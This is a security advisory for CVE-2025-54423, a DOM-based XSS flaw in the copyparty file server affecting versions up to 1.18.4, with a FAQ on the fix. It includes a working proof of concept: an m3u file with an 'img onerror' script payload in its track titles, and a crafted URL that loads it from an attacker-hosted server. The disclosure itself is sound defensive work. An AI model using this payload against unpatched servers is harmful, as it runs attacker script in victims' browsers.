CVE-2025-54423: copyparty has a DOM-Based XSS vulnerability when displaying multimedia metadata
Summary
An unauthenticated attacker is able to execute arbitrary JavaScript code in a victim's browser due to improper sanitization of multimedia tags in music files, including m3u files.
Details
Multimedia metadata is rendered in the web-app without sanitization. This can be exploited in two ways:
a user which has the necessary permission for uploading files can upload a song with an artist-name such as <img src=x onerror=alert(document.domain)> an unauthenticated user can trick another user into clicking a malicious URL, performing this same exploit using an externally-hosted m3u file
The CVE score and PoC is based on the m3u approach, which results in a higher severity.
PoC 1. Create a file named song.m3u with the following content. Host this file on an attacker-controlled web server.
m3u #EXTM3U #EXTINF:1,"><img src=x onerror=alert(document.domain)> - "><img src=x onerror=alert(document.domain)> http://example.com/audio.mp3
2. Craft and share the malicious URL:
http://127.0.0.1:3923/#m3u=https://example.com/song.m3u
Impact Any user that accesses this malicious URL is impacted.
Other sources
copyparty is a portable file server. In versions up to and including versions 1.18.4, an unauthenticated attacker is able to execute arbitrary JavaScript code in a victim's browser due to improper sanitization of multimedia tags in music files, including m3u files. This is fixed in version 1.18.5.
— MITRE
Affected Software
Remediation
Event History
Frequently Asked Questions
What is the severity of CVE-2025-54423?
The severity of CVE-2025-54423 is currently not classified, but it involves the ability for an unauthenticated attacker to execute arbitrary JavaScript code.
What types of files are affected by CVE-2025-54423?
CVE-2025-54423 affects multimedia tags in music files, specifically including m3u files.
How do I fix CVE-2025-54423?
To fix CVE-2025-54423, upgrade to Copyparty version 1.18.5 or later.
Is the vulnerability CVE-2025-54423 remote or local?
CVE-2025-54423 is a remote vulnerability that can be exploited by an unauthenticated attacker.
What software is impacted by CVE-2025-54423?
CVE-2025-54423 impacts Copyparty versions up to and including 1.18.4.